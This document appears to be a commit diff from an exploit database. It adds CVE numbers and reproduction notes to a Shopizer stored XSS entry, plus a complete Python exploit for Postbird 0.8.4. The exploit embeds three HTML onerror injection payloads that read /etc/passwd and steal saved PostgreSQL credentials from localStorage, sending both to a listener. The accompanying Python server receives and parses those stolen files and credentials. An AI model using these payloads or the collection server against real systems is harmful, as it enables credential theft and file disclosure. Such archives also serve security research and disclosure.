DB: 2021-05-28

2 changes to exploits/shellcodes Postbird 0.8.4 - Javascript Injection
2021-05-28 05:01:57 +00:00 · 2021-05-28 05:01:57 +00:00 · b1cf12c4ea
commit b1cf12c4ea
parent aa3c54402b
3 changed files with 91 additions and 0 deletions
--- a/exploits/java/webapps/49901.txt
+++ b/exploits/java/webapps/49901.txt
@ -4,6 +4,7 @@
 # Vendor Homepage: https://www.shopizer.com
 # Software Link: https://github.com/shopizer-ecommerce/shopizer
 # Version: <= 2.16.0
+# CVE: CVE-2021-33561, CVE-2021-33562

 Stored XSS - 'customer_name' Administration 

@ -16,6 +17,7 @@ Steps to reproduce:
 3. Change customer name to <script>alert(1)</script> and save it
 4. Open "Customers" -> XSS payload will trigger

+Except "Customers" section, XSS will be executed in "Orders" (/admin/orders/list.html) and "Recent orders" (/admin/home.html)

 Reflected XSS - 'ref' parameter 

--- a/exploits/multiple/webapps/49910.py
+++ b/exploits/multiple/webapps/49910.py
@ -0,0 +1,88 @@
+# Exploit Title: Postbird 0.8.4 - Javascript Injection
+# Date: [26 May 2021]
+# Exploit Author: Debshubra Chakraborty
+# Vendor Homepage: https://github.com/paxa/postbird
+# Software Link: https://www.electronjs.org/apps/postbird
+# Version: 0.8.4 
+# Tested on: Linux
+# CVE : CVE-2021-33570
+
+"""
+XSS Payload
+<img src="" onerror="var xhttp = new XMLHttpRequest();xhttp.open('GET', 'http://127.0.0.1 :5555/?xss='+JSON.stringify(navigator.appVersion), true);xhttp.send();">
+
+LFI Payload
+<img src="" onerror="var xhttp = new XMLHttpRequest();xhttp.open('GET', 'file:///etc/passwd', false);xhttp.send();var res = xhttp.response;xhttp.open('GET', 'http://127.0.0.1 :5555/?file='+JSON.stringify(res), true);xhttp.send();">
+
+PostgreSQL Password Stealing Payload
+<img src="" onerror="var xhttp = new XMLHttpRequest();xhttp.open('GET', 'http://127.0.0.1 :5555/?credentials='+window.localStorage.savedConnections, true);xhttp.send();">
+
+"""
+
+from http.server import BaseHTTPRequestHandler, HTTPServer
+import urllib.parse
+import re
+
+hostName = '0.0.0.0'
+serverPort = 5555
+
+class MyServer(BaseHTTPRequestHandler):
+    def do_GET(self):
+        self.send_response(200)
+        parse(urllib.parse.unquote(self.requestline))
+
+    def log_message(self, format, *args):
+        return   
+
+
+def parse(data):
+    expression = re.search('\S+=', data)
+    attr = expression.group()
+
+    if attr[2:len(attr)-1] == 'file':
+        data = data[12:len(data)-11]    
+        data = data.rsplit('\\n')
+        print(f'\n[+] File received from LFI: \n\n')
+        for output in data:
+            print(output)
+
+    elif attr[2:len(attr)-1] == 'xss':
+        data = data[11:len(data)-10]
+        print(f'\n[+] Data exfiltration from Stored XSS: \n\n{data}')
+    
+    elif attr[2:len(attr)-1] == 'credentials':
+        pos = re.search('{"\S+:', data)
+        data = data[pos.start():len(data)-11]
+        for i in range(2, len(data), 1):
+            if data[i] == '"':
+                pos = i
+                break
+
+        host = data[2:pos]
+        data = data[14:]
+        data = data.rsplit(',')
+        print(f'\n\n[+] The Database credentials received\n\nHost = {host}')
+        for output in data:
+            print(output)
+    
+    else:
+        print(f'\n\n[-] Unknown header attribute found, atribute = {attr[2:len(attr)-1]}')
+
+
+def main():        
+    global hostName, serverPort
+    webServer = HTTPServer((hostName, serverPort), MyServer)
+    print("Server started http://%s:%s" % (hostName, serverPort))
+
+    try:
+        webServer.serve_forever()
+    
+    except KeyboardInterrupt:
+        pass
+
+    webServer.server_close()
+    print("\nServer stopped.")
+
+
+if __name__ == "__main__":
+    main()
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -44073,3 +44073,4 @@ id,file,description,date,author,type,platform,port
 49905,exploits/php/webapps/49905.txt,"WordPress Plugin Cookie Law Bar 1.2.1 - 'clb_bar_msg' Stored Cross-Site Scripting (XSS)",2021-05-25,"Mesut Cetin",webapps,php,
 49907,exploits/multiple/webapps/49907.py,"Codiad 2.8.4 - Remote Code Execution (Authenticated) (3)",2021-05-26,"Ron Jost",webapps,multiple,
 49909,exploits/php/webapps/49909.py,"Pluck CMS 4.7.13 - File Upload Remote Code Execution (Authenticated)",2021-05-26,"Ron Jost",webapps,php,
+49910,exploits/multiple/webapps/49910.py,"Postbird 0.8.4 - Javascript Injection",2021-05-27,"Debshubra Chakraborty",webapps,multiple,